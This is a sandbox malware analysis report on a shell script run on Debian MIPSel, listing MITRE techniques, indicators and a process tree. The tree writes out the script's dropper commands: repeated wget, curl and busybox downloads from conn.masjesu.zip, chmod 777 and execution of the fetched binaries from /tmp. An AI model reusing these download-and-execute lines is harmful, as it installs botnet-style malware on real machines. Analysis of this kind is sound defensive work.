e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e

Analysis

max time kernel
95s
max time network
97s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
19/11/2024, 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e.sh
Size

10KB
MD5

bf2013c58e6afc9c6a41a659e6578665
SHA1

545dca2856f206869654fe4b32911a95536f2a7d
SHA256

e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e
SHA512

78deb34893d14c46cae969dd2d8dfdc09cb8eee191aed5e15d09d202d880318b372c65e11e37f97d2db2c225376711268240e4e6ce1041fd387197de132c68c3
SSDEEP

192:jQRWWCBwvyJWO0EzWC1dUev0EzWCnkiWCVd:jQRWWCGv2WoudiWCf

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
754	chmod
775	chmod
902	chmod
923	chmod
888	chmod
937	chmod
944	chmod
965	chmod
958	chmod
843	chmod
874	chmod
909	chmod
930	chmod
1000	chmod
1014	chmod
986	chmod
867	chmod
895	chmod
951	chmod
972	chmod
820	chmod
1007	chmod
747	chmod
806	chmod
916	chmod
979	chmod
881	chmod
993	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
915	busybox
990	curl
878	curl
819	busybox
873	busybox
884	wget
758	curl
906	curl
913	curl
941	curl
948	curl
905	wget
829	busybox
891	wget
908	busybox
933	wget
968	wget
771	busybox
950	busybox
957	busybox
922	busybox
955	curl
964	busybox
969	curl
975	wget
985	busybox
791	curl
750	wget
801	busybox
848	wget
864	busybox
871	curl
920	curl
936	busybox
737	curl
940	wget
854	curl
877	wget
919	wget
983	curl
722	wget
912	wget
943	busybox
954	wget
1003	wget
1010	wget
780	wget
826	wget
929	busybox
947	wget
989	wget
992	busybox
753	busybox
870	wget
887	busybox
892	curl
898	wget
899	curl
1011	curl
827	curl
894	busybox
901	busybox
934	curl
982	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	curl
File opened for modification	/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	curl
File opened for modification	/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	curl
File opened for modification	/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	curl
File opened for modification	/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	curl
File opened for modification	/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	curl
File opened for modification	/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	curl
File opened for modification	/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	curl
File opened for modification	/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	curl
File opened for modification	/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	curl
File opened for modification	/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	curl
File opened for modification	/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	curl
File opened for modification	/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	curl
File opened for modification	/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	curl
File opened for modification	/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	curl
File opened for modification	/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	curl
File opened for modification	/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	curl
File opened for modification	/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	curl
File opened for modification	/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	curl
File opened for modification	/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	curl
File opened for modification	/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	curl
File opened for modification	/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	curl
File opened for modification	/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	curl
File opened for modification	/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	curl
File opened for modification	/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	curl
File opened for modification	/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	curl
File opened for modification	/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	curl
File opened for modification	/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	curl

/tmp/e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e.sh
/tmp/e3f4d2c63d1e3f03e250a0f4ffa16158d9b86b798278c35c7935c1fb21b3765e.sh
1⤵
PID:714
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:720
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - System Network Configuration Discovery
  PID:722
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:737
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  PID:746
- /bin/chmod
  chmod 777 inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  ./inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/rm
  rm inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  PID:749
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - System Network Configuration Discovery
  PID:750
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:751
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - System Network Configuration Discovery
  PID:753
- /bin/chmod
  chmod 777 JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  ./JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  PID:756
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  PID:757
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:758
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - System Network Configuration Discovery
  PID:771
- /bin/chmod
  chmod 777 bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  ./bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Executes dropped EXE
  PID:776
- /bin/rm
  rm bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  PID:779
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:780
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:791
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:801
- /bin/chmod
  chmod 777 gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  ./gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Executes dropped EXE
  PID:808
- /bin/rm
  rm gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  PID:810
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:812
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - System Network Configuration Discovery
  PID:819
- /bin/chmod
  chmod 777 BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  ./BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/rm
  rm BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:825
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - System Network Configuration Discovery
  PID:826
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:827
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - System Network Configuration Discovery
  PID:829
- /bin/chmod
  chmod 777 VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - File and Directory Permissions Modification
  PID:843
- /tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  ./VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Executes dropped EXE
  PID:844
- /bin/rm
  rm VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:846
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - System Network Configuration Discovery
  PID:848
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:854
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - System Network Configuration Discovery
  PID:864
- /bin/chmod
  chmod 777 qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  ./qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  PID:869
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - System Network Configuration Discovery
  PID:870
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:871
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - System Network Configuration Discovery
  PID:873
- /bin/chmod
  chmod 777 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  ./0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  PID:876
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - System Network Configuration Discovery
  PID:877
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:880
- /bin/chmod
  chmod 777 yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  ./yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - System Network Configuration Discovery
  PID:887
- /bin/chmod
  chmod 777 JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  ./JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:891
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:894
- /bin/chmod
  chmod 777 xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  ./xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  PID:897
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - System Network Configuration Discovery
  PID:898
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - System Network Configuration Discovery
  PID:901
- /bin/chmod
  chmod 777 LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  ./LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  PID:904
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:905
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:908
- /bin/chmod
  chmod 777 fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  ./fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:915
- /bin/chmod
  chmod 777 D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  ./D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  PID:918
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - System Network Configuration Discovery
  PID:919
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - System Network Configuration Discovery
  PID:922
- /bin/chmod
  chmod 777 yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  ./yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
  2⤵
  PID:925
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - System Network Configuration Discovery
  PID:929
- /bin/chmod
  chmod 777 JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  ./JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
  2⤵
  PID:932
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:933
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - System Network Configuration Discovery
  PID:936
- /bin/chmod
  chmod 777 xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  ./xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - System Network Configuration Discovery
  PID:943
- /bin/chmod
  chmod 777 LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  ./LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
  2⤵
  PID:946
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:947
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - System Network Configuration Discovery
  PID:950
- /bin/chmod
  chmod 777 fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  ./fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
  2⤵
  PID:953
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:954
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - System Network Configuration Discovery
  PID:957
- /bin/chmod
  chmod 777 D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  ./D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
  2⤵
  PID:960
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  PID:961
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - System Network Configuration Discovery
  PID:964
- /bin/chmod
  chmod 777 inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  ./inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
  rm inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
  2⤵
  PID:967
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - System Network Configuration Discovery
  PID:968
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:969
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  PID:971
- /bin/chmod
  chmod 777 JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
